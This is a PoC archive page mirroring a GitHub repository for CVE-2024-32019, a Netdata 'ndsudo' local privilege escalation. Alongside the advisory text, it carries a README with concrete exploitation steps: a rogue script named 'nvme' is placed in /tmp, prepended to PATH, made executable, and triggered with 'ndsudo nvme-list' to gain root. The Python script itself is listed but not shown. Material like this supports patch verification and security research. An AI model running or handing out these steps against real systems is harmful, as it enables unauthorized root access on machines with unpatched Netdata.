Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-32019 PoC — ndsudo: local privilege escalation via untrusted search path

Source
https://github.com/hexared/CVE-2024-32019_poc
Associated Vulnerability
Title:ndsudo: local privilege escalation via untrusted search path (CVE-2024-32019)
Description:Netdata is an open source observability tool. In affected versions the `ndsudo` tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions. The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to. This may lead to local privilege escalation. This vulnerability has been addressed in versions 1.45.3 and 1.45.2-169. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
This is an alternative poc for the CVE-2024-32019 written in python
Readme
# Privilege Escalation via `ndsudo` (Netdata Local Exploit)

This is an alternative POC to exploit a vulnerable `ndsudo` utility bundled with Netdata to perform a local privilege escalation.
The exploit works by adding the script inside the user’s `PATH` substituting an allowed command (`nvme`) by `ndsudo` and execute it as root.

---

## Prerequisites & Assumptions :scroll:

- **Local shell access** on the target system.
- Python3 on the target machine
- Possibilty to execute the `ndsudo` command.

---

## Steps

### 1. Script :hammer:

You can either create or upload the script directly to the target machine as long as it's called as one of the allowed commands.
To check the allowed commands by `ndsudo` just launch `ndsudo --help`.

For this poc we'll use the command `nvme-list`, so the script will be called `nvme`.

---
### 2. PATH injection :syringe:

Once the script has been created and named after an allowed command by `ndsudo` we need to inject it at the beginning of the `PATH` variable so it will be the first one to be found and executed

```bash
export PATH="/tmp/nvme:$PATH"
```
---
### 3. Execution permissions :gun:

Obviusly the script needs to have execution permissions
```bash
chmod +x /tmp/nvme
```
---
### 4. Trigger the Exploit :boom:

Once everything is set up, just launch `ndsudo` with the rogue script and you're root.

```bash
ndsudo nvme-list
```
---

## Resources :books:

- Netdata Github Advisory: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93


Hack responsibly :skull:
File Snapshot

 [4.0K]  /data/pocs/84021d6b52c63c90e7568320e8b017b1a9a8bc6c
├── [  76]  poc.py
└── [1.5K]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →